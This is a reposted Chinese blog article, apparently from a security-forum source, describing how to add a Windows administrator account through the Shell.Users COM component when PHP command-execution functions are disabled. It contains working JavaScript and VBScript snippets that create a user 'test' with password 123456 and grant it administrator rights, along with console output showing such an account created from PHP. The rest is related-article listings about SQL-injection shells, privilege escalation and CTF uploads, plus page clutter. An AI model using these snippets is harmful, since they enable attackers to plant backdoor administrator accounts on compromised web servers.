php 版shell.users 加管理员帐号方法

最新推荐文章于 2025-09-12 13:16:34 发布
转载 最新推荐文章于 2025-09-12 13:16:34 发布 · 2.5k 阅读 · 0
文章标签:

#php #exception #代码分析 #lighttpd #vmware #服务器

本文介绍了一种使用PHP脚本为Windows系统添加管理员账号的方法。该方法通过调用Shell.Users组件创建新用户并设置为管理员权限。适用于Apache环境下运行的Web服务器。

信息来源:邪恶八进制信息安全团队(www.eviloctal.com
议题作者:CyberH4ck[南拳Daddy]
Author: 南拳Daddy 转载请注明出处 hi.baidu.com/南拳daddy

09年的时候 LCX 写出了 js版 和vbs 版的shell.users 加管理员帐号的方法,后来我就想把它改成PHP 版,

由于对代码分析得不够准确,所以到最近才写出来,当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen

以及wscript.shell 组建被禁用的情况下,这也许是一个机会。

代码如下:

 

结果:

 

E:/program/PHPnow-1.5.6/php-5.2.14-Win32>php 1.php
<div align=center><b>PHP 版Shell.Users加管理员帐号</b></div>
Fatal error: Uncaught exception 'com_exception' with message 'Source: Unknown
Description: Unknown' in E:/program/PHPnow-1.5.6/php-5.2.14-Win32/1.php:6
Stack trace:
#0 E:/program/PHPnow-1.5.6/php-5.2.14-Win32/1.php(6): com->create('isosky.test'

#1 {main}
  thrown in E:/program/PHPnow-1.5.6/php-5.2.14-Win32/1.php on line 6

E:/program/PHPnow-1.5.6/php-5.2.14-Win32>net user

User accounts for //ISOSKY-PC

-------------------------------------------------------------------------------
__vmware_user__          Administrator            Guest
HelpAssistant            isosky                   isosky.test
SUPPORT_388945a0
The command completed successfully.


E:/program/PHPnow-1.5.6/php-5.2.14-Win32>

 

 

 

对apache 搭建的Web 服务器可以执行成功,IIS 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。

下面是 LCX 的代码

js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;


vbs:
Set  o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3

添加管理员信息php代码m,管理员添加、编辑功能代码
weixin_35363322的博客
03-10 496
摘要:控制器代码:
ThinkPhp学习笔记——管理员添加
iheyu(一个新手小白女PHP初学者)
06-21 760
//==========修改管理员列表地址==========↓ D:\phpStudy\WWW\niwo\application\admin\view\common\left.html 原内容 &lt;li&gt; &lt;a href="/admin/document/index.html"&gt; ...
php添加管理员页面完整代码,php – Opencart管理员端的空白页面
weixin_35436076的博客
03-18 396
我在locahost设置了opencart商店然后我将所有内容上传到在线托管并更改了root opencart文件夹和Admin文件夹中config.php文件中的路径.前面工作正常,但管理员方面没有工作.它只显示一个空白页面.我调试My Index.php文件是通过回波数在某些地方放置回声来检查它是否正在执行到那一点.我试图解决这个错误.我更新了这里给出的文件代码.一个变化是My Log最近产生...
PHP 代码审计之添加管理员
发哥微课堂
09-02 533
0x00:前言 cms 注册用户时,存在添加管理员漏洞,记录如下。 0x01:代码追踪 首先,前台注册普通账号时,url 地址为 / user/regin.php,打开 regin.php 发现,刚开始是接收注册数据,并进行一些校验,代码如下: if(!check::CheckUser($_POST['user_name'])) { check::AlertExit("输入的用户...
[thinkPHP5项目实战_21]管理员添加、删除和修改
骑着代码去流浪
10-29 5924
与之前的业务一样,管理员添加和删除代码如下: 1.新建admin的控制器、视图和验证器文件: 2.控制器代码: <?php namespace app\admin\controller; use think\Controller; class Admin extends Controller { public function lists() { $
phpshell.users管理员帐号方法 - cracer_优快云
m0_67888657的博客
07-12 105
PHP Shell.Users管理员帐号
php用户管理拿shell,phpshell.users管理员帐号方法
weixin_36070568的博客
03-12 132
议题作者:CyberH4ck[南拳Daddy]Author: 南拳Daddy 转载请注明出处 hi.baidu.com/南拳daddy09年的时候 LCX 写出了 js 和vbs shell.users 管理员帐号方法,后来我就想把它改成PHP ,由于对代码分析得不够准确,所以到最近才写出来,当 php执行命令的函数如exec,system,shell_exec,proc_open,p...
php用户管理拿shell,php shell.users 管理员帐号方法
weixin_35975406的博客
03-12 103
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
PHP实现Ftp用户的在线管理的代码
10-31
如果当前用户不是管理员,则需要使用`su`命令以管理员身份执行以上命令: ```bash su root -c 'echo <passwd> | pw useradd <username> [-g ] [-s ] [-h 0]' ``` #### 通过PHP调用系统命令 主要难点在于如何通过PHP...
sqlmap之getshell没有管理员权限怎么办
04-03
### 关于SQLMap获取Shell时无管理员权限的解决方案 当尝试通过 `sqlmap` 获取 shell 时,如果目标数据库用户的权限不足,则可能无法成功执行某些操作。以下是几种常见的解决方法: #### 权限提升的可能性分析 即使...
mongodb 添加用户及权限设置详解
12-16
首先,与 MySQL 等传统的关系型数据库不同,MongoDB 并没有预设的管理员账号。这意味着在启用权限认证之前,你需要自己创建管理员账户。在 MongoDB 的 shell 中,你需要切换到 `admin` 数据库,因为在这个数据库中...
数据库权限提升GetShell
saber的博客
10-21 1229
各类常见数据库提权方式及提权资料文章
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权
weixin_50815573的博客
03-03 4720
Vulnhub 靶机实战系列:DC -3网站管理员账号密码和系统提权 搭建测试靶机 下载地址:DC: 3.2 ~ VulnHub 则靶机DC-3 ip:192.168.1.106(NAT连接) 攻击机kali linux ip:192.168.1.237 信息收集 使用:nmap -sP 192.168.0.0/24 进行扫描找到目标靶机 对目标靶机进行端口扫描 利用nmap对目标主机进行端口扫描,发现开放端口:80 使用命令:nmap -A -p- -T4 192.168.1.106
php实现管理员登录功能
weixin_33933118的博客
10-15 5938
2019独角兽企业重金招聘Python工程师标准>>> ...
浮动交易策略
2401_84919512的博客
09-08 233
浮动交易系统(Acme F)分为两个分支:突破系统(FB)和回调系统(FP),两者都基于浮动通道和浮动百分比的概念。- 核心思路:当股价接近浮动通道的上轨(预示多头趋势)或下轨(预示空头趋势),并且在盘整后,结合浮动百分比和特定表格形态(如连续几根柱状图的高点或低点相近),判断突破的有效性。- 突破系统(FB):当股价接近浮动通道上轨(多头)或下轨(空头)且在盘整后,结合浮动百分比和特定表格形态(连续几根柱状图高点或低点相近),判断突破有效性。结合浮动百分比和股价趋势,交易者需灵活应对突破后的快速反转。
PHP:从入门到实战的全方位指南
最新发布
z18072129907的博客
09-12 201
从简单的脚本语言到企业级应用开发平台,PHP的进化史印证了"适者生存"的技术法则。对于开发者而言,掌握现代PHP开发实践不仅能提升开发效率,更能构建出高性能、安全可靠的应用系统。无论是维护遗留系统还是开发新项目,PHP都值得纳入技术选型考虑范围。
CentOS7下Ceph集群部署实战
2503_91960880的博客
09-09 1077
通过 CRUSH 算法将其映射到不同的 OSD 节点上,实现数据的存储。我们可以将其理解为 Ceph 存储上划分的逻辑分区,Pool 由多个 PG 组成;2、集群网络(cluster-network,用于集群内部通讯)与公共网络(public-network,用于外部访问Ceph集群)分离。Ceph 客户端向 monitor 请求集群的状态,并向 Pool 中写入数据,数据根据 PGs 的数量,3、mon、mds 与 osd 分离部署在不同主机上(测试环境中可以让一台主机节点运行多个组件)
ctfshow_web13-----------文件上传.user.ini
hello_mszcc的博客
09-11 268
猜测flag就在903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php文件下了。经尝试,改后缀php5,ptml均不行,使用.htaccess文件也不成功。正则过滤了php,文件大小<24,文件名小于9。扫描后发现存在upload.php.bak。又是菜鸡的一天,周五没有课,爽爽爽!上传.user.ini,在文件中写上。然后用蚁剑连接,发现可以连接不能操作。打开题目发现是一个文件上传题。,所有文件都可以包含它。
Web For Pentester:Sqli Sector
m0_46604997的博客
09-12 538
本文完成了Web For Pentester靶机的Sqli Sector。案例1-3演示了单引号闭合、空格过滤绕过等技术;案例4-7分析了数字型注入及正则过滤的绕过;案例8-9展示了ORDER BY注入的特殊性,其中利用反引号和延时注入获取数据库信息。所有案例均存在未过滤用户输入直接拼接SQL语句的问题,导致注入风险。针对这些漏洞,建议采用参数化查询、严格的输入验证、最小权限原则等防御措施。文中还提供了自动化检测脚本,强调了对SQL注入漏洞进行全面检测的重要性。
简化shell.dat修改过程的工具发布
- 工具用途:这个生成器很可能是用于自动化创建或修改“shell.dat”文件,以便于服务端管理员可以快速配置和部署外网访问。 - 场景应用:在游戏服务器需要对外开放以供玩家通过互联网连接时,通常需要一些额外的配置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值